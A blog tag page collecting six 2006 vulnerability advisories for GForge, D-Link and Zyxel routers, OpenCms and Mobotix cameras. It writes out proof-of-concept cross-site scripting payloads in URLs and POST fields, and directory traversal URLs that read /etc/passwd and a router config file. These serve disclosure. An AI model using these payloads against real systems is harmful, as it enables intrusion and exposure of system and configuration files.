xss

Entradas con la etiqueta ‘xss’

GForge Cross Site Scripting vulnerability

26 de Octubre de 2006 |

Autor: admin

Version:	Tested on GForge 4.5.11
Discovered by:	José Ramón Palanco: jose.palanco(at)eazel(dot)es http://www.eazel.es
Description:	GForge is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause a cross site scripting. To exploit any attacker may send via GET method the “words” variable to: >”<script>alert(‘www.eazel.es’)</script> to http://site/search/advanced_search.php?group_id=X&search=1 where X is any active project in the gforge installation. Timeline: discovered: 26/10/2006 published: 5/01/2007 keywords: advisory006-gforge-cross-site-scripting-vulnerability.html

Version:

Tested on GForge 4.5.11

Discovered by:

José Ramón Palanco: jose.palanco(at)eazel(dot)es

http://www.eazel.es

Description:

GForge is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause a cross site scripting.

To exploit any attacker may send via GET method the “words” variable to:
>”<script>alert(‘www.eazel.es’)</script>
to http://site/search/advanced_search.php?group_id=X&search=1
where X is any active project in the gforge installation.
Timeline:
discovered: 26/10/2006
published: 5/01/2007

keywords: advisory006-gforge-cross-site-scripting-vulnerability.html

Publicado en Security Advisories |

Etiquetas: gforge, xss |

No hay comentarios »

D-Link DSL-G624T several vulnerabilities

20 de Octubre de 2006 |

Autor: admin

Version:	Tested on D-Link DSL-G624T Version: Firmware Version : V3.00B01T01.YA-C.20060616
Discovered by:	José Ramón Palanco: jose.palanco(at)eazel(dot).es http://www.eazel.es
Description:	D-Link DSL-G624T ADSL Router is vulnerable to several securities. Directory transversal http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml Cross Site Scripting Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fstate Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt> Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fconnection Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt> Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fconnection Value:: “+onmouseover=”alert(20102006) Directory listing Is possible to list the /cgi-bin directory keywords: advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html

Version:

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616

Discovered by:

José Ramón Palanco: jose.palanco(at)eazel(dot).es

http://www.eazel.es

Description:

D-Link DSL-G624T ADSL Router is vulnerable to several securities.

Directory transversal

http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt>

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >”><ScRiPt%20%0a%0d>alert(20102006)%3B</ScRiPt>

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: “+onmouseover=”alert(20102006)

Directory listing

Is possible to list the /cgi-bin directory

keywords: advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html

Publicado en Security Advisories |

Etiquetas: d-link, directory transversal, xss |

1 comentario »

Zyxel Prestige 660H-61 Cross Site Scripting

26 de Julio de 2006 |

Autor: admin

Version:	Tested on Zyxel Prestige 660H-61 ZyNOS F/W Version: V3.40(PT.0)b32 \| 1/28/2005 Standard:NORMAL
Discovered by:	José Ramón Palanco: jose.palanco(at)eazel(dot).es http://www.eazel.es
Description:	Zyxel Prestige 660H-61 ADSL Router is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause a cross site scripting in this script: http://router/Forms/rpSysAdmin?a=%3Cscript%3Ealert(‘www.eazel.es’)%3C/script%3E keywords: advisory004-Zyxel-Prestige-660H-61-Cross-Site-Scripting.php

Version:

Tested on Zyxel Prestige 660H-61
ZyNOS F/W Version: V3.40(PT.0)b32 | 1/28/2005
Standard:NORMAL

Discovered by:

José Ramón Palanco: jose.palanco(at)eazel(dot).es

http://www.eazel.es

Description:

Zyxel Prestige 660H-61 ADSL Router is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks.
Due to improper filtering, a remote attacker can cause a cross site scripting in this script:

http://router/Forms/rpSysAdmin?a=%3Cscript%3Ealert(‘www.eazel.es’)%3C/script%3E

keywords: advisory004-Zyxel-Prestige-660H-61-Cross-Site-Scripting.php

Publicado en Security Advisories |

Etiquetas: xss, zyxel |

No hay comentarios »

D-Link DSA-3100 XSS

27 de Mayo de 2006 |

Autor: admin

Version:	Tested on D-Link DSA-3100
Discovered by:	Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es
Description:	D-Link DSA-3100 Airspot Gateway is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause a cross site scripting in this script: http://accespoint/login_error.shtml?uname=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E keywords: advisory003-D-Link-DSA-3100-Cross-Site-Scripting.php

Version:

Tested on D-Link DSA-3100

Discovered by:

Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es

Description:

D-Link DSA-3100 Airspot Gateway is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks.
Due to improper filtering, a remote attacker can cause a cross site scripting in this script:

http://accespoint/login_error.shtml?uname=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E

keywords: advisory003-D-Link-DSA-3100-Cross-Site-Scripting.php

Publicado en Security Advisories |

Etiquetas: d-link, dsa, xss |

No hay comentarios »

OpenCms 6.0.X Xml Content Demo search engine xss

22 de Mayo de 2006 |

Autor: admin

Version:	Tested on: - 6.0.0 - 6.0.2 - 6.0.3
Discovered by:	Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es
Description:	Input passed to the search query in the Xml Content Demo search engine isn’t properly sanitised. This can be exploited to conduct cross-site scripting attacks. Example: http://host/opencms/opencms /system/modules/org.opencms .frontend.templateone/pages /search.html?action=search &query=%22%3E%3Cscript%3Ealert %28′www.eazel.es’%29%3C %2Fscript%3E%3C!-&index=Online +project+%28VFS%29&page=1&uri= %2Fxmlcontentdemo%2Fside _element_demo.html&__locale=en &query2=%3Cscript%3Ealert%28a %29%3C%2Fscript%3E Keywords: advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.php

Version:

Tested on:
- 6.0.0
- 6.0.2
- 6.0.3

Discovered by:

Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es

Description:

Input passed to the search query in the Xml Content Demo search engine isn’t properly sanitised. This can be exploited to conduct cross-site scripting attacks.
Example:

http://host/opencms/opencms /system/modules/org.opencms .frontend.templateone/pages /search.html?action=search &query=%22%3E%3Cscript%3Ealert %28′www.eazel.es’%29%3C %2Fscript%3E%3C!-&index=Online +project+%28VFS%29&page=1&uri= %2Fxmlcontentdemo%2Fside _element_demo.html&__locale=en &query2=%3Cscript%3Ealert%28a %29%3C%2Fscript%3E

Keywords: advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.php

Publicado en Security Advisories |

Etiquetas: opemcms, xml, xss |

No hay comentarios »

Mobotix IP Network Cameras Multiple XSS

17 de Mayo de 2006 |

Autor: admin

Version:	Mobotix IP Network Cameras Multiple Cross Site Scripting Tested on M1 and M10 - M10-V2.0.5.2 - M1-V1.9.4.7
Discovered by:	Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es
Description:	Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws.Due to improper filtering a remote attacker can cause a cross site scripting in these scripts: http://camera/help/help?%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E&download=egal http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E
Vendor:	MOBOTIX provides new software versions that include a security patch that prevents cross site scripting flaws. MOBOTIX encourages customers to upgrade to at least software version - V2.2.3.18 (for camera models M10/D10) and - V3.0.3.31 (for camera model M22) or higher (if available). The software is available for download from our website www. mobotix .com : http://www. mobotix .com/service s/software_downloads keywords: advisory001

Publicado en Security Advisories |

Etiquetas: mobotix, xss |

No hay comentarios »